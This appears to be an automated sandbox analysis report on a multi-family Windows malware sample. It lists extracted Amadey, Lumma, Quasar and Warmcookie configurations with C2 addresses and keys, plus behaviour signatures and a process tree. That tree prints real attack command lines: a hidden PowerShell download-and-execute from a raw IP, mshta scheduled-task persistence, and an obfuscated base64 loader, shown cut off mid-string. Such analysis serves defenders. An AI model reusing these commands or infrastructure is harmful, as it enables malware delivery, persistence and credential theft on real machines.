Analysis

  • max time kernel
    127s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250313-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/04/2025, 02:44

General

  • Target

    2025-04-02_4c530b76a01160d626f759ad0127f97b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    4c530b76a01160d626f759ad0127f97b

  • SHA1

    be994f6376d96dd75c7f486f7f851314a6a47745

  • SHA256

    e3db77358dc6fa07364f7d1ca2d61ca449d5391e59f4611d8e90a2b3f1a6b894

  • SHA512

    2a0ba9b484c530e4f0bbafae85c751398d907b26b220bd75880a9981818b0d92949a3a32e9418742290e8678552e3b5e3ded1824cf7b74eb841ed0a08401eb50

  • SSDEEP

    24576:9qDEvCTbMWu7rQYlBQcBiT6rprG8a0nu:9TvC/MTQYxsWR7a0n

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://navstarx.shop/FoaJSi

https://dmetalsyo.digital/opsa

https://ironloxp.live/aksdd

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://-targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://targett.top/dsANGt

https://hadvennture.top/GKsiio

https://anavstarx.shop/FoaJSi

https://6jmetalsyo.digital/opsa

https://qspacedbv.world/EKdlsk

Extracted

Family

amadey

Version

5.33

Botnet

faec90

Attributes
  • install_dir

    52907c9546

  • install_file

    tgvazx.exe

  • strings_key

    cc9d94f7503394295f4824f8cfd50608

  • url_paths

    /Di0Her478/index.php

rc4.plain

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

C2

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes
  • encryption_key

    BF72099FDBC6B48816529089CF1CF2CF86357D14

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Modded Client Startup

  • subdirectory

    SubDir

Extracted

Family

warmcookie

C2

192.36.57.50

Attributes
  • mutex

    62580f79-f0e4-46c9-9fe6-041328dce2b7

  • user_agent

    Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Warmcookie family
  • Warmcookie, Badspace

    Warmcookie aka Badspace is a backdoor written in C++.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 19 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 7 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 16 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 47 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 60 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Reads ssh keys stored on the system 2 TTPs

    Tries to access SSH used by SSH programs.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 22 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 15 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 35 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Launches sc.exe 64 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 27 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 64 IoCs
  • Modifies data under HKEY_USERS 49 IoCs
  • Modifies registry class 4 IoCs
  • NTFS ADS 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious behavior: MapViewOfSection 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 27 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2952
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:6288
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:4704
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
          PID:7600
      • C:\Users\Admin\AppData\Local\Temp\2025-04-02_4c530b76a01160d626f759ad0127f97b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
        "C:\Users\Admin\AppData\Local\Temp\2025-04-02_4c530b76a01160d626f759ad0127f97b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
        1⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:5096
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn UjuE1mazLNR /tr "mshta C:\Users\Admin\AppData\Local\Temp\ZHXvfgFWD.hta" /sc minute /mo 25 /ru "Admin" /f
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2972
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn UjuE1mazLNR /tr "mshta C:\Users\Admin\AppData\Local\Temp\ZHXvfgFWD.hta" /sc minute /mo 25 /ru "Admin" /f
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:3660
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\ZHXvfgFWD.hta
          2⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2940
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LQRERAXZ3ETZL2IE2NFQJEHMYPDVWWGS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            3⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:5560
            • C:\Users\Admin\AppData\Local\TempLQRERAXZ3ETZL2IE2NFQJEHMYPDVWWGS.EXE
              "C:\Users\Admin\AppData\Local\TempLQRERAXZ3ETZL2IE2NFQJEHMYPDVWWGS.EXE"
              4⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:3000
              • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
                5⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Downloads MZ/PE file
                • Checks BIOS information in registry
                • Checks computer location settings
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Adds Run key to start application
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:1820
                • C:\Users\Admin\AppData\Local\Temp\10398310101\XOPPRUc.exe
                  "C:\Users\Admin\AppData\Local\Temp\10398310101\XOPPRUc.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious use of WriteProcessMemory
                  PID:4408
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    7⤵
                      PID:3580
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      7⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4048
                  • C:\Users\Admin\AppData\Local\Temp\10404930101\PQPYAYJJ.exe
                    "C:\Users\Admin\AppData\Local\Temp\10404930101\PQPYAYJJ.exe"
                    6⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:5572
                    • C:\Users\Admin\Abspawnhlp.exe
                      "C:\Users\Admin\Abspawnhlp.exe"
                      7⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of WriteProcessMemory
                      PID:5848
                      • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                        C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                        8⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: MapViewOfSection
                        • Suspicious use of WriteProcessMemory
                        PID:5968
                        • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                          C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                          9⤵
                          • Downloads MZ/PE file
                          • Checks computer location settings
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          • Modifies registry class
                          PID:3896
                          • C:\Windows\SysWOW64\msiexec.exe
                            "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000910271\FRDKTUCO.msi" /quiet
                            10⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5908
                          • C:\Users\Admin\AppData\Local\Temp\10000920101\LXUZVRLG.exe
                            "C:\Users\Admin\AppData\Local\Temp\10000920101\LXUZVRLG.exe"
                            10⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:2764
                            • C:\Users\Admin\Abspawnhlp.exe
                              "C:\Users\Admin\Abspawnhlp.exe"
                              11⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of SetThreadContext
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious behavior: MapViewOfSection
                              PID:456
                              • C:\Users\Admin\Abspawnhlp.exe
                                C:\Users\Admin\Abspawnhlp.exe
                                12⤵
                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                • Loads dropped DLL
                                • System Location Discovery: System Language Discovery
                                PID:4284
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\SysWOW64\cmd.exe
                                12⤵
                                • System Location Discovery: System Language Discovery
                                PID:6168
                          • C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe
                            "C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe"
                            10⤵
                            • Executes dropped EXE
                            • Drops file in Windows directory
                            PID:6084
                          • C:\Windows\SysWOW64\msiexec.exe
                            "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000950271\UVXEUGTZ.msi" /quiet
                            10⤵
                            • System Location Discovery: System Language Discovery
                            PID:2280
                          • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                            "C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe"
                            10⤵
                            • Executes dropped EXE
                            PID:3576
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 80
                              11⤵
                              • Program crash
                              PID:5908
                          • C:\Windows\SysWOW64\msiexec.exe
                            "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000970271\NBFRPMVB.msi" /quiet
                            10⤵
                            • System Location Discovery: System Language Discovery
                            PID:992
                          • C:\Users\Admin\AppData\Local\Temp\10000980101\IEYKSCXV.exe
                            "C:\Users\Admin\AppData\Local\Temp\10000980101\IEYKSCXV.exe"
                            10⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:2888
                          • C:\Users\Admin\AppData\Local\Temp\10000991101\KRWXARXD.exe
                            "C:\Users\Admin\AppData\Local\Temp\10000991101\KRWXARXD.exe"
                            10⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:6496
                            • C:\Users\Admin\CamMenuMaker.exe
                              "C:\Users\Admin\CamMenuMaker.exe"
                              11⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious behavior: MapViewOfSection
                              PID:6968
                              • C:\Users\Admin\CamMenuMaker.exe
                                C:\Users\Admin\CamMenuMaker.exe
                                12⤵
                                • Loads dropped DLL
                                PID:7720
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Enc UgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAJwB3AGkAdwBlAHIANwAuADUALgBlAHgAZQAnACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAdwBpAHcAZQByADcALgA1AC4AZQB4AGUAJwApACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0ATwBuAGMAZQAgAC0AQQB0ACAAKABHAGUAdAAtAEQAYQB0AGUAKQAgAC0AUgBlAHAAZQB0AGkAdABpAG8AbgBJAG4AdABlAHIAdgBhAGwAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBNAGkAbgB1AHQAZQBzACAANQApACkAIAAtAFUAcwBlAHIAIAAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlACAALQBSAHUAbgBMAGUAdgBlAGwAIABIAGkAZwBoAGUAcwB0ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0AUwBlAGMAbwBuAGQAcwAgADAAKQAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAKQAgAC0ARgBvAHIAYwBlAA==
                                  13⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  PID:6972
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\SysWOW64\cmd.exe
                                12⤵
                                  PID:2032
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\SysWOW64\cmd.exe
                            9⤵
                            • Drops file in Windows directory
                            • Suspicious behavior: EnumeratesProcesses
                            PID:5756
                    • C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe
                      "C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe"
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of WriteProcessMemory
                      PID:5376
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        7⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2540
                    • C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe
                      "C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe"
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of WriteProcessMemory
                      PID:4292
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        7⤵
                          PID:1816
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          7⤵
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1780
                      • C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe
                        "C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe"
                        6⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:404
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          7⤵
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3152
                      • C:\Users\Admin\AppData\Local\Temp\10408830101\YGYZCmt.exe
                        "C:\Users\Admin\AppData\Local\Temp\10408830101\YGYZCmt.exe"
                        6⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:5324
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          7⤵
                            PID:5992
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                            7⤵
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:6100
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"
                          6⤵
                          • System Location Discovery: System Language Discovery
                          PID:2476
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"
                            7⤵
                              PID:3084
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4